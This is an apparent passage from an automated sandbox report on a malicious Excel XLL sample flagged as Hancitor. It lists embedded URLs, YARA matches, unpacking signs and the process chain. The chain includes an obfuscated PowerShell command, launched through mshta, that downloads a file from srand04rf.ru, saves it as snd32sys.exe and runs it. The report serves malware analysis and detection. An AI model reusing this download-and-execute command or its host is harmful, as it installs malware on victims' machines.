        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://incidents.diagnostics.office.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://lifecycle.office.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://login.microsoftonline.com/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://login.windows.local
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://management.azure.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://management.azure.com/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://messaging.office.com/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://ncus.contentsync.
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://ncus.pagecontentsync.
        Source: powershell.exe, 00000002.00000002.350802485.0000000005BA1000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://officeapps.live.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://onedrive.live.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://onedrive.live.com/embed?
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://osi.office.net
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://outlook.office.com/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://outlook.office365.com/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://pages.store.office.com/review/query
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://powerlift.acompli.net
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
        Source: 0708_5355150121.xllString found in binary or memory: https://sectigo.com/CPS0
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://settings.outlook.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://shell.suite.office.com:1443
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://skyapi.live.net/Activity/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://staging.cortana.ai
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://store.office.cn/addinstemplate
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://store.office.com/addinstemplate
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://store.office.de/addinstemplate
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://tasks.office.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://templatelogging.office.com/client/log
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://web.microsoftstream.com/video/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://webshell.suite.office.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://wus2.contentsync.
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://wus2.pagecontentsync.
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://www.odwebp.svc.ms

        System Summary:

        barindex
        Malicious sample detected (through community Yara rule)Show sources
        Source: 16.3.snd32sys.exe.12f4305.0.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
        Source: 16.3.snd32sys.exe.12f4305.0.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
        Source: 16.2.snd32sys.exe.610000.0.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
        Powershell drops PE fileShow sources
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\snd32sys.exeJump to dropped file
        Source: C:\Users\Public\snd32sys.exeProcess Stats: CPU usage > 98%
        Source: C:\Windows\SysWOW64\mshta.exeCode function: 1_3_064950B7
        Source: C:\Windows\SysWOW64\mshta.exeCode function: 1_3_064950B7
        Source: C:\Windows\SysWOW64\mshta.exeCode function: 1_3_064950B7
        Source: C:\Windows\SysWOW64\mshta.exeCode function: 1_3_064950B7
        Source: C:\Windows\SysWOW64\mshta.exeCode function: 1_3_064950B7
        Source: C:\Windows\SysWOW64\mshta.exeCode function: 1_3_064950B7
        Source: C:\Windows\SysWOW64\mshta.exeCode function: 1_3_064950B7
        Source: C:\Windows\SysWOW64\mshta.exeCode function: 1_3_064950B7
        Source: C:\Windows\SysWOW64\mshta.exeCode function: 1_3_064950B7
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04B2E670
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00643154
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0063A1B7
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0063C250
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0064920D
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00643386
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0062D39F
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00629420
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_006435C7
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0065F68B
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00639707
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0062D711
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0063C7C0
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0065F7AB
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0064382C
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0065B830
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0062D9BB
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00643AA0
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0062CB20
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0063CBF0
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00652C03
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00642CE1
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0062DC82
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00643D05
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0062DF3D
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00642F13
        Source: C:\Users\Public\snd32sys.exeCode function: String function: 0062B2C4 appears 61 times
        Source: C:\Users\Public\snd32sys.exeCode function: String function: 0062BBA0 appears 50 times
        Source: C:\Users\Public\snd32sys.exeCode function: String function: 0062B2F8 appears 46 times
        Source: 0708_5355150121.xllStatic PE information: invalid certificate
        Source: snd32sys.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: snd32sys.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
        Source: 0708_5355150121.xllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
        Source: 16.3.snd32sys.exe.12f4305.0.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
        Source: 16.3.snd32sys.exe.12f4305.0.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
        Source: 16.2.snd32sys.exe.610000.0.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
        Source: 00000001.00000003.225595145.0000000006590000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
        Source: 00000001.00000003.224640872.0000000002F76000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
        Source: 00000001.00000002.227307568.0000000002F76000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
        Source: 00000001.00000003.225197640.0000000002F76000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
        Source: 00000002.00000002.348453730.0000000004B30000.00000004.00000040.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
        Source: 00000002.00000003.262530252.0000000007E07000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
        Source: 00000001.00000003.224221003.0000000002F76000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
        Source: 00000001.00000003.225049085.0000000002F76000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
        Source: classification engineClassification label: mal100.troj.expl.evad.winXLL@10/11@4/4
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3412:120:WilError_01
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{0A2181D0-DD23-4259-8109-9971A9896497} - OProcSessId.datJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\Public\snd32sys.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\Public\snd32sys.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: 0708_5355150121.xllVirustotal: Detection: 23%
        Source: 0708_5355150121.xllReversingLabs: Detection: 17%
        Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /dde
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\res32.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe'
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle c:\Users\Public\snd32sys.exe
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\snd32sys.exe 'C:\Users\Public\snd32sys.exe'
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\res32.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe'
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle c:\Users\Public\snd32sys.exe
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\snd32sys.exe 'C:\Users\Public\snd32sys.exe'
        Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
        Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
        Source: Binary string: c:\HighNature\Straightbusy\conditionSurface\Jobhas\industryCountryfeel.pdb source: snd32sys.exe, snd32sys.exe.6.dr

        Data Obfuscation:

        barindex
        Detected unpacking (overwrites its own PE header)Show sources
        Source: C:\Users\Public\snd32sys.exeUnpacked PE file: 16.2.snd32sys.exe.610000.0.unpack
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00613560 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,
        Source: initial sampleStatic PE information: section where entry point is pointing to: .img
        Source: 0708_5355150121.xllStatic PE information: section name: .img
        Source: 0708_5355150121.xllStatic PE information: section name: .ico
        Source: 0708_5355150121.xllStatic PE information: section name: .fyjrtr
        Source: 0708_5355150121.xllStatic PE information: section name: .rytkrer
        Source: 0708_5355150121.xllStatic PE information: section name: .reyery
        Source: 0708_5355150121.xllStatic PE information: section name: .txt
        Source: 0708_5355150121.xllStatic PE information: section name: .res
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04B212A1 push es; ret
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0062B28D push ecx; ret
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0062034A push 8BFFFFFFh; ret
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_006208AD push 8BFFFFFFh; ret
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0062BBE6 push ecx; ret
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\snd32sys.exeJump to dropped file
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\snd32sys.exeJump to dropped file

        Boot Survival:

        barindex
        Drops PE files to the user root directoryShow sources
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\snd32sys.exeJump to dropped file
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00629420 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
